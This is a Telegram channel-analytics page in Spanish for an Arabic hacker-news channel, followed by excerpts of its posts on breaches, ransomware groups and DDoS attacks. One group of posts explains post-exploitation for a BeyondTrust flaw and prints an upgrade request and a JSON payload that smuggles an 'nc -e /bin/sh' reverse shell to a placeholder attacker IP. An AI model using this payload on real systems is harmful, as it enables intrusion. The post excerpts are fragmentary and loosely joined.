Hacker News
المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين صفحتنا الأولى https://www.facebook.com/HackerNews2
Mostrar más📈 Análisis del canal de Telegram Hacker News
El canal Hacker News (@hackernewsar) en el segmento lingüístico de Árabe es un actor destacado. Actualmente la comunidad reúne a 13 296 suscriptores, ocupando la posición 9 599 en la categoría Tecnologías y Aplicaciones y el puesto 5 750 en la región Arabia Saudí.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 13 296 suscriptores.
Según los últimos datos del 25 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 4, y en las últimas 24 horas de -3, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 14.31%. Durante las primeras 24 horas tras publicar, el contenido suele obtener 5.13% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 1 903 visualizaciones. En el primer día suele acumular 682 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 17.
- Intereses temáticos: El contenido se centra en temas clave como نِظَام, شَرِكَة, اِختِرَاق, مَجمُوعَة, بَيَان.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين
صفحتنا الأولى https://www.facebook.com/HackerNews2”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 26 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
وأعرب رئيس الوزراء النيوزيلندي كريستوفر لوكسون عن قلقه البالغ حيال الحادثة، داعياً إلى تشديد قوانين الأمن السيبراني في البلاد، وأكدت السلطات الصحية في نيوزيلندا والشرطة أن الأولوية القصوى حالياً هي سلامة المرضى والتحقق من صحة البيانات قبل إعادة تشغيل النظام.#HackerNews #MediMap #CharlieKirk
ملاحظة: يمتلك دونالد ترامب منتجع وفندق فاخر (5 نجوم) يضم أجنحة وشققاً فندقية في لاس فيغاس.#HackerNews #ShinyHunters
* سبب الاختیار: أنظمة BeyondTrust ھي "بنوك كلمات مرور". الحصول على صلاحیة RCE یعني إمكانیة فك تشفیر كلمات المرور المخزنة والوصول إلى بقیة خوادم الشركة دون إثارة أي إنذار.3 سيناريو التخفي والبقاء (Persistence via Web Shell): یھدف المھاجم ھنا لضمان العودة للجھاز حتى لو قامت الشركة بإعادة تشغیله أو تغییر كلمات المرور. - الأدوات المستخدمة: بوابة خلفیة بسیطة (Web Shell) مكتوبة بـ PHP أو Python. - آلیة العمل: یرسل المھاجم أمراً عبر الـ WebSocket یقوم بإنشاء ملف جدید في مسار الویب الخاص بالمنصة مثلاً : /usr/share/web/shell.php یحتوي ھذا الملف على سطر برمجي واحد یسمح للمھاجم بإرسال أوامر عبر المتصفح مباشرة.
* سبب الاختیار: الـ Shell Web یمنح المھاجم "رابطاً سریاً" خاصاً به. حتى لو أغلق المھاجم اتصال الـ WebSocket الأول، یمكنه العودة في أي وقت عبر طلب HTTP بسیط للمسار الذي أنشأه.4 سیناریو "الاستطلاع الداخلي" (Internal Scanning) : استخدام جھاز BeyondTrust كـ "قفزة" للھجوم على الشبكة الداخلیة التي لا تظھر على الإنترنت. - الأدوات المستخدمة: Nmap أو سكربتات Bash مخصصة للمسح. - آلیة العمل: یقوم المھاجم بتحمیل أداة Nmap على جھاز BeyondTrust المخترق، ثم یأمره بمسح الأجھزة المجاورة له في الشبكة المحلیة (مثل أجھزة المدیر المالي أو خوادم البیانات).
* سبب الاختیار: جھاز BeyondTrust موثوق به داخل الشبكة، فعملیات المسح القادمة منه لن تبدو مشبوھة لأنظمة الأمان الداخلیة وليس كما لو كانت قادمة من عنوان IP خارجي.#HackerNews #BeyondTrust
* سبب الاختیار: لأن الـ Reverse Shell یجعل جھاز الضحیة ھو من "یتصل" بالمھاجم، وھو ما تسمح بھ معظم جدران الحمایة (Outbound Traffic)، مما یضمن للمھاجم بقاء الاتصال مستقراً لفترة طویلة.#HackerNews #BeyondTrust
GET /nw HTTP/1.1 Host: [Target_IP] Upgrade: websocket Connection: Upgrade Sec-WebSocket-Key: [Random_Key] Sec-WebSocket-Version: 13بمجرد رد الخادم بـ Protocols Switching 101 ، یصبح الطریق مفتوحاً لإرسال "الحمولات" (Payloads) مباشرة إلى المعالج الداخلي دون قیود HTTP التقلیدیة. إرسال الحمولة (بعد الترقیة): بعد نجاح الترقیة، یرسل المھاجم رسالة بصیغة JSON عبر قناة الـ WebSocket المفتوحة:
{"remoteVersion": "$(nc -e /bin/sh [Attacker_IP] [Port])"}
ھنا یظن النظام أنه یستلم "رقم إصدار"، لكن بسبب استخدام Evaluation Arithmetic Bash بشكل غیر آمن، یقوم النظام بتنفیذ الأمر الموجود بین القوسین (...)$ فورا،ً مما یعطي المھاجم "صلاحیة الوصول الكاملة" (Shell Reverse) BeyondTrust Release Notes .
#HackerNews
#BeyondTrustوشملت البيانات المسروقة: -بيانات العملاء: هويات الشركات التي تتعامل معها، العقود، والأرقام الضريبية. -التقارير المالية: ميزانيات الشركات، كشوفات الرواتب، والحسابات البنكية. -أسرار تجارية: استشارات قانونية ومالية حساسة.تستخدم مجموعة الهاكرز Tengu أسلوب "الابتزاز المزدوج" حيث تقوم بتشفير الملفات مما يجعل من المستحيل فتحها، وتطلب "فدية" مالية بالعملات الرقمية مقابل عدم نشر هذه البيانات. استهدفت مجموعة Tengu منذ ظهورها لأول مرة في 21 أكتوبر 2025 أكثر من 43 ضحية حول العالم، تركز بشكل كبير على قطاعات التصنيع، التكنولوجيا، الخدمات اللوجستية، والمحاسبة. #HackerNews #Tengu #DarkWeb
-بيانات الحساب: أرقام الحسابات الدولية (IBAN/RIB) -نوع الحسابات (جاري، ادخار، أوراق مالية) واسم البنك. -بيانات صاحب الحساب: الاسم الكامل، تاريخ ومكان الميلاد، والعنوان. -الحالات: تواريخ فتح الحساب أو إغلاقه أو تعديله. -الأرقام الضريبية.وصفت وزارة الاقتصاد والمديرية العامة للمالية العامة (DGFiP) المنفذ بأنه "طرف خبيث" (Malicious actor) استخدم هويات رقمية مسروقة تخص أحد الموظفين الحكوميين للوصول إلى النظام. وبدأت الوزارة بإبلاغ الأشخاص المتضررين بشكل شخصي، وتم تقديم شكوى جنائية وإبلاغ هيئة حماية البيانات الفرنسية (CNIL). #HackerNews
تتعلق الثغرة بأنظمة المؤسسات (Enterprise Systems) الضخمة، وليست أجهزة استهلاكية (مثل اللاب توب). تستهدف البنية التحتية لمراكز البيانات (Data Centers).#HackerNews #CVE_2026_22769 #رمضان_مبارك
وجه المسؤولون في كييف أصابع الاتهام إلى مجموعات مرتبطة بروسيا أو مجموعات تعمل لصالحها، في هجمات مماثلة سابقة وقعت في فبراير، نُسبت العمليات لمجموعات مثل "NoName057(16)"، وهي مجموعة تنشط في تنفيذ هجمات حجب الخدمة (DDoS).#HackerNews
تشير التقديرات الأولية إلى وصول المهاجمين إلى بيانات شخصية للعملاء تشمل الأسماء، وأرقام الهواتف، والبريد الإلكتروني، وعناوين الشحن، و تم إيقاف المتجر مؤقتاً لإجراء التحقيقات وتقييم الأضرار الناتجة عن هذا النوع من الهجمات المعروف بـ "هجوم سلاسل التوريد".فيما واجه بنك "A-Bank" إلى جانب بنوك ومؤسسات مالية أخرى هجمات من نوع "حجب الخدمة الموزعة" (DDoS)، مما أدى إلى تعطل مؤقت في خدمات الدفع عبر الإنترنت، وتطبيقات الهاتف المحمول، وعمليات السحب من أجهزة الصراف الآلي. #HackerNews
مجموعة The Gentlemen هي مجموعة برمجيات فدية ظهرت بنشاط متزايد منذ أواخر عام 2025، وتستخدم تقنيات متطورة مثل استغلال برامج تشغيل ويندوز (Windows drivers) والتلاعب بسياسات المجموعات (GPO) لتجاوز الدفاعات الأمنية. سجلت المجموعة 128 ضحية حول العالم حتى أوائل فبراير 2026.يأتي هذا الهجوم تزامناً مع إعلان مجلس الأمن السيبراني لحكومة الإمارات في 18 فبراير 2026 عن آلاف محاولات الاختراق يومياً، مشيراً إلى أن قطاعي النقل والخدمات المالية هما من بين الأكثر استهدافاً منذ بداية العام. #HackerNews #TheGentlemen
أمضى موقع Drop Site News الأشهر الماضية في كشف صلات إبستين بالمخابرات الأمريكية والإسر*ائيلية. و بالتعاون مع موقع Jmail لجعل ملفات إبستين الكاملة متاحة وقابلة للبحث.#HackerNews #DropSiteNews #Jmail #EPSTEIN
وسعى إبستين من خلال المشروع إلى تطوير أدوات استخباراتية جديدة تهدف إلى "اعتراض" وفهم الاتصالات والرسائل المتبادلة بين الخلايا الحية داخل الكائنات الحية.#HackerNews #DropSiteNews #Jmail #EPSTEIN
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
